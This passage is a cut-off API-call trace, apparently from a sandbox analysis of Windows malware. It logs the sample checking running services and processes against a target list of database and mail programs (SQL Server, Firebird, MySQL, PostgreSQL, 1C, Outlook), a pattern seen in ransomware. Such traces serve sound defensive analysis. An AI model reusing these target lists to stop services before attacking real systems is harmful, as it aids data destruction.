(lpString1="mssqlserver", lpString2="netprofm") returned -1 [0044.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0044.122] lstrlenW (lpString="NlaSvc") returned 6 [0044.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0044.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0044.122] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0044.122] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0044.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0044.122] lstrlenW (lpString="nsi") returned 3 [0044.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0044.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0044.122] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0044.122] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0044.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0044.122] lstrlenW (lpString="PcaSvc") returned 6 [0044.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0044.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0044.123] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0044.123] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0044.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0044.123] lstrlenW (lpString="PlugPlay") returned 8 [0044.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0044.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0044.123] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0044.123] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0044.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0044.123] lstrlenW (lpString="Power") returned 5 [0044.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0044.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0044.123] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0044.123] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0044.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0044.123] lstrlenW (lpString="ProfSvc") returned 7 [0044.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0044.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0044.123] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0044.123] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0044.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0044.123] lstrlenW (lpString="RpcEptMapper") returned 12 [0044.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0044.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0044.123] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0044.123] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0044.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0044.123] lstrlenW (lpString="RpcSs") returned 5 [0044.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0044.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0044.123] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0044.123] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0044.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0044.123] lstrlenW (lpString="SamSs") returned 5 [0044.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0044.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0044.124] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0044.124] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0044.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0044.124] lstrlenW (lpString="Schedule") returned 8 [0044.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0044.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0044.124] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0044.124] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0044.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0044.124] lstrlenW (lpString="SENS") returned 4 [0044.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0044.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0044.124] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0044.124] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0044.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0044.124] lstrlenW (lpString="ShellHWDetection") returned 16 [0044.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0044.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0044.124] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0044.124] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0044.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0044.124] lstrlenW (lpString="Spooler") returned 7 [0044.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0044.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0044.124] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0044.124] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0044.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0044.124] lstrlenW (lpString="SysMain") returned 7 [0044.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0044.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0044.124] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0044.124] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0044.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0044.124] lstrlenW (lpString="Themes") returned 6 [0044.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0044.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0044.125] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0044.125] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0044.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0044.125] lstrlenW (lpString="TrkWks") returned 6 [0044.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0044.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0044.125] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0044.125] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0044.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0044.125] lstrlenW (lpString="UxSms") returned 5 [0044.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0044.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0044.125] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0044.125] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0044.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0044.125] lstrlenW (lpString="VSS") returned 3 [0044.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0044.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0044.125] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0044.125] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0044.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0044.125] lstrlenW (lpString="WdiServiceHost") returned 14 [0044.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0044.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0044.125] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0044.125] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0044.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0044.125] lstrlenW (lpString="WdiSystemHost") returned 13 [0044.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0044.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0044.126] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0044.126] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0044.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0044.126] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0044.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0044.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0044.126] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0044.126] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0044.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0044.126] lstrlenW (lpString="Winmgmt") returned 7 [0044.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0044.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0044.126] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0044.126] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0044.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0044.126] lstrlenW (lpString="WPDBusEnum") returned 10 [0044.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0044.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0044.126] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0044.126] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0044.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0044.126] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3943b50 | out: hHeap=0x600000) returned 1 [0044.126] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1bc [0044.128] Process32FirstW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0044.128] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0044.129] lstrlenW (lpString="System") returned 6 [0044.129] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0044.129] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0044.129] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0044.129] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0044.129] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0044.129] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0044.129] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0044.129] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0044.135] lstrlenW (lpString="smss.exe") returned 8 [0044.135] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0044.135] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0044.135] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0044.135] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0044.135] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0044.135] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0044.135] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0044.135] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0044.135] lstrlenW (lpString="csrss.exe") returned 9 [0044.135] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0044.135] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0044.135] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0044.135] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0044.135] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0044.135] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0044.135] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0044.135] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0044.136] lstrlenW (lpString="wininit.exe") returned 11 [0044.136] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0044.136] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0044.136] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0044.136] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0044.136] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0044.136] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0044.136] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0044.136] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0044.137] lstrlenW (lpString="csrss.exe") returned 9 [0044.137] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0044.137] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0044.137] lstrlenW (lpString="winlogon.exe") returned 12 [0044.138] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0044.138] lstrlenW (lpString="services.exe") returned 12 [0044.138] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0044.139] lstrlenW (lpString="lsass.exe") returned 9 [0044.139] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0044.139] lstrlenW (lpString="lsm.exe") returned 7 [0044.139] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.140] lstrlenW (lpString="svchost.exe") returned 11 [0044.140] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.141] lstrlenW (lpString="svchost.exe") returned 11 [0044.141] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.141] lstrlenW (lpString="svchost.exe") returned 11 [0044.141] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.142] lstrlenW (lpString="svchost.exe") returned 11 [0044.142] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.142] lstrlenW (lpString="svchost.exe") returned 11 [0044.142] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0044.143] lstrlenW (lpString="audiodg.exe") returned 11 [0044.143] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.144] lstrlenW (lpString="svchost.exe") returned 11 [0044.144] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.144] lstrlenW (lpString="svchost.exe") returned 11 [0044.144] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0044.145] lstrlenW (lpString="dwm.exe") returned 7 [0044.145] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0044.145] lstrlenW (lpString="explorer.exe") returned 12 [0044.145] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0044.146] lstrlenW (lpString="spoolsv.exe") returned 11 [0044.146] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0044.147] lstrlenW (lpString="taskhost.exe") returned 12 [0044.147] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.147] lstrlenW (lpString="svchost.exe") returned 11 [0044.147] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0044.148] lstrlenW (lpString="taskeng.exe") returned 11 [0044.148] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0044.148] lstrlenW (lpString="taskhost.exe") returned 12 [0044.148] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0044.149] lstrlenW (lpString="challenging.exe") returned 15 [0044.149] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0044.150] lstrlenW (lpString="pgp prix.exe") returned 12 [0044.150] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0044.150] lstrlenW (lpString="user-reno.exe") returned 13 [0044.150] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0044.151] lstrlenW (lpString="aggregate.exe") returned 13 [0044.151] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0044.151] lstrlenW (lpString="dressed.exe") returned 11 [0044.151] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0044.152] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0044.152] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0044.153] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0044.153] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0044.153] lstrlenW (lpString="developing.exe") returned 14 [0044.153] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0044.154] lstrlenW (lpString="supported.exe") returned 13 [0044.154] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0044.154] lstrlenW (lpString="girlstionselect.exe") returned 19 [0044.154] Process32NextW (in: hSnapshot=0x1bc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, 